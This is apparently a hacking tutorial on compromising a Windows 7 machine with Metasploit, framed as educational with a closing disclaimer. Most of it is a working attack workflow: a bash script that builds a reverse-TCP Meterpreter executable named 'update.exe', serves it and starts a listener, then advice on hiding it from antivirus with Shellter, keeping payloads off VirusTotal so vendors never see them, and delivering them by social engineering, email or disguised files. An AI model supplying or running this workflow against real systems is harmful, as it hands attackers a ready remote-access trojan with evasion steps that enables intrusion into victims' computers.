For this video article I set up a Windows 7 machine as an easy target, create a payload with Metasploit's msfvenom, and take full control of the target from the Metasploit msfconsole. After that we have some fun with the session.
The commands in this tutorial are the same whether you use Kali Linux or Parrot Security OS. I am using Kali Linux, but once Metasploit is installed the same commands work on any operating system, including a regular Ubuntu installation.
In the video I put the payload created with msfvenom on the Apache server that ships with Kali Linux.
There are simpler ways to serve the file, though.
Make sure python3 is installed; then a single command starts a web server in the current directory. By default it listens on port 8000 on all interfaces, so run it from a directory that holds only the payload and stop it when you are done:
python3 -m http.server
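The full flow described above, as an added example that is not part of the original article: it builds a reverse-TCP Meterpreter executable with msfvenom, serves it with python3's http.server bound to a single interface, and starts a multi/handler listener from a generated msfconsole resource file. The payload type, the LHOST/LPORT values and the file name update.exe are assumptions for a lab network; change them to your own.

```shell
#!/usr/bin/env bash
# Added example (not the article's own commands): build a Windows reverse-TCP
# Meterpreter payload with msfvenom, stage it behind python3 -m http.server,
# and start a multi/handler listener from a generated resource file.
# LHOST/LPORT/HTTP_PORT and the file name are assumed lab values; edit them.
set -eu

LHOST="${LHOST:-192.168.56.10}"   # attacker IP reachable from the Windows 7 VM (assumed)
LPORT="${LPORT:-4444}"
HTTP_PORT="${HTTP_PORT:-8080}"
PAYLOAD="windows/meterpreter/reverse_tcp"
WWW="${WWW:-./www}"

# Build the msfvenom command line. Kept as a function so the exact flags can be
# inspected (or tested) without msfvenom being installed.
venom_cmd() {
  local lhost="$1" lport="$2" out="$3"
  printf 'msfvenom -p %s LHOST=%s LPORT=%s -f exe -o %s' "$PAYLOAD" "$lhost" "$lport" "$out"
}

# Write an msfconsole resource script for the listener. "ExitOnSession false"
# plus "exploit -j -z" keeps the handler running for more than one connection.
make_handler_rc() {
  local rc="$1" lhost="$2" lport="$3"
  cat > "$rc" <<EOF
use exploit/multi/handler
set PAYLOAD $PAYLOAD
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j -z
EOF
}

# Generate the executable, refusing to continue if msfvenom is missing.
build_payload() {
  command -v msfvenom >/dev/null 2>&1 || {
    echo "msfvenom not found; install metasploit-framework first" >&2
    return 1
  }
  mkdir -p "$WWW"
  eval "$(venom_cmd "$LHOST" "$LPORT" "$WWW/update.exe")"
  ls -l "$WWW/update.exe"
}

# Serve only the payload directory, and only on LHOST, so the file is not
# exposed on every interface of the attacking machine.
serve_payload() {
  echo "serving $WWW at http://$LHOST:$HTTP_PORT/update.exe"
  python3 -m http.server "$HTTP_PORT" --bind "$LHOST" --directory "$WWW" &
  echo $! > "$WWW/.httpd.pid"   # kill $(cat www/.httpd.pid) when finished
}

# Start the listener; the Windows 7 VM connects back here after running update.exe.
start_handler() {
  make_handler_rc handler.rc "$LHOST" "$LPORT"
  msfconsole -q -r handler.rc
}

# Only run the whole workflow when invoked with "run"; without it the file just
# defines the functions so they can be sourced and called one at a time.
if [ "${1:-}" = "run" ]; then
  build_payload
  serve_payload
  start_handler
fi
```

Run it as `bash payload-flow.sh run` (any file name works) on the attacking machine. Because the handler is started with `exploit -j -z`, each connection from the target shows up in msfconsole as a background session that you attach to with `sessions -i <id>`.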
Obviously it is better if you can program a bit yourself, so that you can write your own loader that antivirus does not yet recognise (what people call FUD, "fully undetectable", although nothing stays undetectable for long). Not everyone can do that, which is why you can use the tool below instead.
To hide the executable from signature-based antivirus you can use Shellter. Rather than shipping the raw msfvenom executable, Shellter injects the payload into a legitimate 32-bit Windows program at a point it finds by tracing that program's execution, so the result keeps the host program's structure and no longer carries the static signature of a plain msfvenom binary. Keep in mind that this only defeats static signatures: behaviour-based detection can still catch the payload once it runs and connects back. Shellter itself is a Windows program; on Linux it runs under Wine.
For Debian-based distributions like Kali Linux or Parrot Security:
sudo apt install shellter
For Arch-based distributions like BlackArch:
sudo pacman -S shellter
Be aware: never, ever upload your scripts, payloads or anything else you made to VirusTotal or other online scanners. They hand everything over to antivirus companies; this has never been a secret.
This is a mistake I see many people make. If you are using someone else's tool, every upload makes it less likely to work in the future. Antivirus companies are not always detecting the payload itself; they are often detecting the method used to hide it. So every time you upload a test payload, you are helping them along. If you only want to know whether a sample is already known, look up its hash instead: a hash search does not submit the file.
VirusTotal analyzes suspicious files and URLs to detect malware and automatically shares them with the security community.
Obviously, if you are a regular computer user who does not deal with payloads and scripts, and you suspect a file is malicious, then by all means find out whether the file is dangerous.
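A safer check, added here and not part of the original article: instead of uploading the file, ask VirusTotal whether it already knows the file's SHA-256 hash. Only the hash leaves your machine, so an unknown payload stays unknown. The environment variable name VT_API_KEY is an assumption; the v3 files endpoint it queries is VirusTotal's public API.

```shell
#!/usr/bin/env bash
# Added example, not from the article: check whether a payload is already known
# to VirusTotal by its SHA-256 hash, without ever uploading the file.
# Assumes curl, sha256sum (or shasum) and an API key in $VT_API_KEY (assumed name).
set -eu

# Hash the file locally; this string is the only thing sent to VirusTotal.
file_sha256() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | cut -d ' ' -f 1
  else
    shasum -a 256 "$1" | cut -d ' ' -f 1
  fi
}

# Look the hash up with a GET request. HTTP 200 means VirusTotal already has
# the sample (so vendors have seen it); 404 means it is unknown and, because
# this is a lookup rather than a scan, it stays unknown. Never call an upload
# endpoint from a tool like this.
vt_hash_lookup() {
  local hash="$1"
  local status
  status=$(curl -s -o /dev/null -w '%{http_code}' \
    -H "x-apikey: ${VT_API_KEY:?set VT_API_KEY to your VirusTotal API key}" \
    "https://www.virustotal.com/api/v3/files/$hash")
  case "$status" in
    200) echo "known: $hash is already on VirusTotal"; return 0 ;;
    404) echo "unknown: $hash has not been seen; do NOT upload it"; return 1 ;;
    *)   echo "lookup failed with HTTP $status" >&2; return 2 ;;
  esac
}

# Usage: vt-check.sh <file>; with no argument only the functions are defined.
if [ "${1:-}" != "" ]; then
  vt_hash_lookup "$(file_sha256 "$1")"
fi
```

The exit status distinguishes the three outcomes (0 known, 1 unknown, 2 error), so the script can be used from other tooling; a 404 is the answer you want for your own payload.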
A payload can be compared with a virus: it is the code that runs on the target once it has been delivered and executed. In this tutorial it is the executable msfvenom produces, which connects back to the msfconsole listener and hands you control of the machine.
Like the Greek soldiers hiding inside the wooden horse in the tale of the Trojan Horse, a malicious payload can sit harmlessly for some time until it is triggered and does its job.
How do you get the payload onto the victim's machine? That is a question I could turn into a lot of articles.
Once you have created a payload you still have to deliver it, and that can be quite a challenge. Below are some options.
- Social engineering
- Hide the payload in an image
- Hide the payload in a PDF file
- Put the payload on a server
- Put the payload on a website
- Send the payload by email
- And so on
- This article was written for educational purposes and penetration testing only.
- The author cannot be held responsible for damage caused by the use of these resources.
- You will not misuse the information to gain unauthorized access.
- The information shall only be used to expand knowledge and not for causing malicious or damaging attacks.
- Just remember: performing any hacks without written permission is illegal!
My goal is to educate people and increase awareness by exposing the methods real black-hat hackers use and showing how to secure systems against them.
(writer: bulls eye)